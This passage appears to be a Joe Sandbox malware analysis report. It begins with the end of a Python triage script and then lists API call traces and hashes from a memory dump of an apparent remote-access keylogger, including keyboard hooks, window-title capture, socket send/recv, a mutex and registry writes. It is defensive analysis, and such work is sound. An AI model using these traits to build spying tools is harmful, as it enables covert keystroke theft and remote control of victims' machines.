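    for h in find_api_patch(parse_trace(SAMPLE_TRACE)):
        print("API patch: resolve@%08X protect@%08X restore@%08X (%d bytes)"
              % (h["resolve_ref"], h["protect_ref"], h["restore_ref"], h["patch_bytes"]))
    for s, where in match_strings(SAMPLE_BLOB).items():
        print("string %r at %s" % (s, where))
```

On the sample trace the first GetProcAddress (ref 1464C804) is followed by the writable VirtualProtect at 1464C816 and the restore at 1464C82A, so one hit of 0x78 bytes is reported; the second GetProcAddress at 1464C860 has no VirtualProtect after it and is not flagged. Feeding the function a full "APIs" list from another block is the intended use; the string scan is deliberately loose (substring, either encoding) and should be treated as a triage signal, not a verdict.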
APIs
• RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 1234377E
• RegSetValueExA.KERNEL32(?,123974B8,00000000,?,00000000,00000000,123A52F0,?,?,1233F853,123974B8,4.9.4 Pro), ref: 123437A6
• RegCloseKey.KERNEL32(?,?,?,1233F853,123974B8,4.9.4 Pro), ref: 123437B1
Strings
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: CloseCreateValue
• String ID: pth_unenc
• API String ID: 1818849710-4028850238
• Opcode ID: 2321a0d96a8d387a436bbcfad9b88ec25692159e380376124137589657c34457
• Instruction ID: 6fad0df00cfc15c2d32ad180353f9f51bfa596f8b9060b0adf8531de107461e8
• Opcode Fuzzy Hash: 2321a0d96a8d387a436bbcfad9b88ec25692159e380376124137589657c34457
• Instruction Fuzzy Hash: F7F06DB2540118FBCB029FA0DC45EEA3B7CEF04651F208654FD49AA110EB31AF14EB90
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,123A4F50), ref: 12334DB3
• CreateThread.KERNEL32(00000000,00000000,?,123A4EF8,00000000,00000000), ref: 12334DC7
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 12334DD2
• FindCloseChangeNotification.KERNEL32(00000000,?,00000000), ref: 12334DDB
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: Create$ChangeCloseEventFindNotificationObjectSingleThreadWait
• String ID:
• API String ID: 2579639479-0
• Opcode ID: 9d80ccc7d2379aca4bdba0294ba6cb2707412b22ff0e8fa57f0898a484bb289b
• Instruction ID: 6b9276c6ff73d2ff96f3c841caf1330dda8f9e6fcc3d4b9b4e4c703475a35918
• Opcode Fuzzy Hash: 9d80ccc7d2379aca4bdba0294ba6cb2707412b22ff0e8fa57f0898a484bb289b
• Instruction Fuzzy Hash: 1D41B47A6483056FC766DB60CC54DBFB7EDEF84312F400A1DF592922A1DB20EA09C762
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,1233A74D), ref: 1233A6AB
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,1233A74D), ref: 1233A6BA
• Sleep.KERNEL32(00002710,?,?,?,1233A74D), ref: 1233A6E7
• FindCloseChangeNotification.KERNEL32(00000000,?,?,?,1233A74D), ref: 1233A6EE
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: File$ChangeCloseCreateFindNotificationSizeSleep
• String ID:
• API String ID: 4068920109-0
• Opcode ID: 35a06592033898afd6a939173cecd4257049bf0d8f44278e9b3455d394d8e44b
• Instruction ID: 048675c99df3f6a57b6239930f342c5bb5aee1adf32037fadf182578a0a63786
• Opcode Fuzzy Hash: 35a06592033898afd6a939173cecd4257049bf0d8f44278e9b3455d394d8e44b
• Instruction Fuzzy Hash: ED115072E80354AEDA23562488D4A7E3B5EBB81357F000A18E287877C1C7616A47C361
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,1233A843), ref: 1234C49E
• GetFileSize.KERNEL32(00000000,00000000), ref: 1234C4B2
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 1234C4D7
• FindCloseChangeNotification.KERNEL32(00000000), ref: 1234C4E5
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: File$ChangeCloseCreateFindNotificationReadSize
• String ID:
• API String ID: 2135649906-0
• Opcode ID: d76b6f5e23ff4ca299426cfe258b34abaa4837b6cec16f83a42ab5bdc06909e8
• Instruction ID: c4004a89e94ce99d6a1ac9a909fb40b684ac8546c756ab93fd5d7bcb9470874b
• Opcode Fuzzy Hash: d76b6f5e23ff4ca299426cfe258b34abaa4837b6cec16f83a42ab5bdc06909e8
• Instruction Fuzzy Hash: 3EF0C2B23412187FE2121A209CC4FBB379CEBC66A5F110B29F942E23C0CA614D058231
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateMutexA.KERNEL32(00000000,00000001,00000000,1233EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,123960BC,00000003,00000000), ref: 1233D078
• GetLastError.KERNEL32 ref: 1233D083
Strings
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: CreateErrorLastMutex
• String ID: Rmc-W5UGP5
• API String ID: 1925916568-504190447
• Opcode ID: eeebc4273c3c0fc154a895c596515bb875b38552ca0d397f456edab52f9fc7d5
• Instruction ID: 67b21f168588dbe5647b6d1c1fb3f5ad9c83da0eb4b74c57492f41a8211bc7a8
• Opcode Fuzzy Hash: eeebc4273c3c0fc154a895c596515bb875b38552ca0d397f456edab52f9fc7d5
• Instruction Fuzzy Hash: 2CD012F5AA42249FD7191770C8D976C3DA897D4702F400929F40BC9AC0DB6485908A12
Uniqueness

Uniqueness Score: -1.00%

APIs
• send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 12334B36
• WaitForSingleObject.KERNEL32(00000000,00000000,1233547D,?,?,00000004,?,?,00000004,?,123A4EF8,?), ref: 12334B47
• SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,123A4EF8,?,?,?,?,?,?,1233547D), ref: 12334B75
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: EventObjectSingleWaitsend
• String ID:
• API String ID: 3963590051-0
• Opcode ID: 282dfe3da2cb70833376d5180a853a292da27e8d4d04278f977175055ae709d8
• Instruction ID: ce325d75e1f1e4dd22e728b6c8ca8cd5b6b9d8c45989e4929eab1b65786b2d2c
• Opcode Fuzzy Hash: 282dfe3da2cb70833376d5180a853a292da27e8d4d04278f977175055ae709d8
• Instruction Fuzzy Hash: 7C2141B7900119ABCF56DBA4EC84DFEBB7CBF18311B004615E915A21A0EF34BB15CAA0
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 123435CA
                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 123435E7
                                                                                                                                                                                          • RegCloseKey.KERNEL32(?), ref: 123435F2
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3677997916-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,123A52F0), ref: 12343714
• RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 1234372D
• RegCloseKey.KERNEL32(00000000), ref: 12343738
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 12343569
• RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,123A52F0), ref: 12343587
• RegCloseKey.KERNEL32(?), ref: 12343592
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,1233C19C,12396C48), ref: 12343516
• RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,1233C19C,12396C48), ref: 1234352A
• RegCloseKey.KERNEL32(?,?,?,1233C19C,12396C48), ref: 12343535
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegCreateKeyA.ADVAPI32(80000001,00000000,123960A4), ref: 12343885
• RegSetValueExA.KERNEL32(123960A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,1233C152,12396C48,00000001,000000AF,123960A4), ref: 123438A0
• RegCloseKey.ADVAPI32(123960A4,?,?,?,1233C152,12396C48,00000001,000000AF,123960A4), ref: 123438AB
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: CloseCreateValue
• String ID:
• API String ID: 1818849710-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,123A4EF8,12334C49,00000000,00000000,00000000,?,123A4EF8,?), ref: 12334BA5
• SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,1233548B), ref: 12334BC3
• recv.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 12334BDA
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: EventObjectSingleWaitrecv
• String ID:
• API String ID: 311754179-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GlobalMemoryStatusEx.KERNEL32(?), ref: 1234B7CA
Strings
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: GlobalMemoryStatus
• String ID: @
• API String ID: 1890195054-2766056989
                                                                                                                                                                                          • Opcode ID: a036a345f30bf25ecfe0758cb2782774fd381fa667e684a75faaf845e31ee1a5
                                                                                                                                                                                          • Instruction ID: 282991f77563a7be06d76186f3c3b75335129a32d76268e2cbfcdba1e71fb755
                                                                                                                                                                                          • Opcode Fuzzy Hash: a036a345f30bf25ecfe0758cb2782774fd381fa667e684a75faaf845e31ee1a5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 20D017B580232CDFC720DFA8E844A8DBBFCFB08210F00456AED49E3700E770A8008B84
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: CountEventTick
• String ID:
• API String ID: 180926312-0
• Opcode ID: badd25df68cb9b8ff8bfd47f7d630d310c80acd28ce9e07d2ecbdef5cb2702f1
• Instruction ID: a292a64b014ee10d98d040836429e254137e8ea962d5017f60515fe3ae44ad8d
• Opcode Fuzzy Hash: badd25df68cb9b8ff8bfd47f7d630d310c80acd28ce9e07d2ecbdef5cb2702f1
• Instruction Fuzzy Hash: 52516E3B5083405AC7BAEB21D890ABFB3E5AF91711F504A6DD586871D4EF307A09C642
Uniqueness
Uniqueness Score: -1.00%

APIs
• socket.WS2_32(00000002,00000001,00000006), ref: 12334852
• CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,1233530B,?,?,00000000,00000000,?,Offline Keylogger Started,00000000,12335208,?,00000000), ref: 1233488E
  • Part of subcall function 1233489E: WSAStartup.WS2_32(00000202,00000000), ref: 123348B3
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: CreateEventStartupsocket
• String ID:
• API String ID: 1953588214-0
• Opcode ID: bd920f450eb05400b285aaad9bafc4545678ecf1fa6e429bfd2ede7aa8f1eba4
• Instruction ID: d2caa88237913bcbd0c889fa390de20b9b7e80e7b1b6e8b75b45e729caf6b2da
• Opcode Fuzzy Hash: bd920f450eb05400b285aaad9bafc4545678ecf1fa6e429bfd2ede7aa8f1eba4
• Instruction Fuzzy Hash: FD0171B5858BE09FE7368F28A4857867FE4AB05314F044E5EF1DB9BB91C7B1A481CB10
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
• Instruction ID: a210a0d6227235addd54fbba1c302f3f0c25aa062d896c6259d38078a23d13fa
• Opcode Fuzzy Hash: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
• Instruction Fuzzy Hash: FCF027B3B152025ADB1E8B30C850B6A77BA5F80317F14CB6DF89BC54D4C730CA90C600
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetForegroundWindow.USER32 ref: 1234BAB8
• GetWindowTextW.USER32(00000000,?,00000100), ref: 1234BACB
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: Window$ForegroundText
• String ID:
• API String ID: 29597999-0
• Opcode ID: 21ecbfe089474d1864fd893a540c151d17e775f3cf06ebacf64d52def975b389
• Instruction ID: 2904fc950bef337ad4530027acedee2392d73f01ee5aee753791b5ce37f9f911
• Opcode Fuzzy Hash: 21ecbfe089474d1864fd893a540c151d17e775f3cf06ebacf64d52def975b389
• Instruction Fuzzy Hash: B8E0D876A4032827E73096A49C8DFF5776CEB04700F000199F61DD72C1E9B0AA04CBE0
Uniqueness
Uniqueness Score: -1.00%

APIs
• getaddrinfo.WS2_32(00000000,00000000,00000000,123A2ADC,123A50E4,00000000,12345188,00000000,00000001), ref: 12344F0B
• WSASetLastError.WS2_32(00000000), ref: 12344F10
  • Part of subcall function 12344D86: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 12344DD5
  • Part of subcall function 12344D86: LoadLibraryA.KERNEL32(?), ref: 12344E17
  • Part of subcall function 12344D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 12344E37
  • Part of subcall function 12344D86: FreeLibrary.KERNEL32(00000000), ref: 12344E3E
  • Part of subcall function 12344D86: LoadLibraryA.KERNEL32(?), ref: 12344E76
  • Part of subcall function 12344D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 12344E88
  • Part of subcall function 12344D86: FreeLibrary.KERNEL32(00000000), ref: 12344E8F
  • Part of subcall function 12344D86: GetProcAddress.KERNEL32(00000000,?), ref: 12344E9E
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
• String ID:
• API String ID: 1170566393-0
• Opcode ID: bdc3a521075f6f1699fa2bd54c2a0d7c2949892d391c994b78be4b1fd44e96ad
• Instruction ID: 7f4238ad9fee826ef3e854574ecb7a0d2821e2648c03224bfe085865b919f79b
• Opcode Fuzzy Hash: bdc3a521075f6f1699fa2bd54c2a0d7c2949892d391c994b78be4b1fd44e96ad
• Instruction Fuzzy Hash: 4BD012732411316FE360A6594C44BBAD6DCDBD67607150576F914D3100DA508C4186A0
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: aa9612c468631c8733b0ba7410eaa7de454ed8386f5af0c55508338788386e1a
• Instruction ID: f711058848295697c56a826315088b26dcb9320567ba81d86b7dce9f9cd7f59c
• Opcode Fuzzy Hash: aa9612c468631c8733b0ba7410eaa7de454ed8386f5af0c55508338788386e1a
• Instruction Fuzzy Hash: EF11E373B105429FD3049E19C884F96B7BAFF81715B654398E186CB292DF31E851C690
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: _wcslen
• String ID:
• API String ID: 176396367-0
• Opcode ID: e2370c0e7dacc0b19a5211f7bb573ce0c44a36e09d7091f9183fd7dd9d28dcfc
• Instruction ID: 57d122a2eb724fc6a5401fd7e316cf43985e89a6ceffd68346df42549a77fd79
• Opcode Fuzzy Hash: e2370c0e7dacc0b19a5211f7bb573ce0c44a36e09d7091f9183fd7dd9d28dcfc
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A1172379002099FCB66DF64E8509FF7BF9AF54311B10412AE84696290FF74BA16CB90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 12375AF3: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,123782CA,00000001,00000364,?,1236BD0B,00000000,00000000,00000000,00000000,00000000,?,?), ref: 12375B34
                                                                                                                                                                                          • _free.LIBCMT ref: 12380140
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocateHeap_free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 614378929-0
                                                                                                                                                                                          • Opcode ID: fdbd8fd48d54792b4aab90f4371f9c4c5731c6c52bc699df08f3ae970cc02b1f
                                                                                                                                                                                          • Instruction ID: f3ea1d635e7ce5edcfa66797b589729cbadf998a11106240ba0283360f808c70
                                                                                                                                                                                          • Opcode Fuzzy Hash: fdbd8fd48d54792b4aab90f4371f9c4c5731c6c52bc699df08f3ae970cc02b1f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 15012B776003859BE3318E69D885AA9FBD8EB85370F25071DD594872C0E630A805C674
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CallNextHookEx.USER32(123A50F0,?,?,?), ref: 1233A3D2
                                                                                                                                                                                            • Part of subcall function 1233B646: GetKeyState.USER32(00000011), ref: 1233B64B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CallHookNextState
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3280314413-0
                                                                                                                                                                                          • Opcode ID: d622c44fbf08cdb5a77c438a9687f244e71aae25bec6e5541689a5a8e5439c9f
                                                                                                                                                                                          • Instruction ID: 5c911240a6d55aa560c2b8256ce3a3f68374608da5dcb851fd4ce1831b2d42f4
                                                                                                                                                                                          • Opcode Fuzzy Hash: d622c44fbf08cdb5a77c438a9687f244e71aae25bec6e5541689a5a8e5439c9f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2CF028B77042055BCB1B9EB4DC84DBEBB9AEBC6327F000A2DE80286552DA61E609C710
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,123782CA,00000001,00000364,?,1236BD0B,00000000,00000000,00000000,00000000,00000000,?,?), ref: 12375B34
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                          • Opcode ID: 32243b7623f6a6b2535693a5bb3c29dd9be240d9eb608f03e664349569589499
                                                                                                                                                                                          • Instruction ID: 20deef0bf423a7142b0baa448b10b258b5881f3859091516c13fe29879c4d092
                                                                                                                                                                                          • Opcode Fuzzy Hash: 32243b7623f6a6b2535693a5bb3c29dd9be240d9eb608f03e664349569589499
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5DF0E9B36441785ADF795A22AC44FBBB74DAF40771B418211EC18EA1C0CF28E800C6F0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,123652BC,?,?,12368847,?,?,00000000,?,?,1233DE62,123652BC,?,?,?,?), ref: 12376169
                                                                                                                                                                                          Memory Dump Source
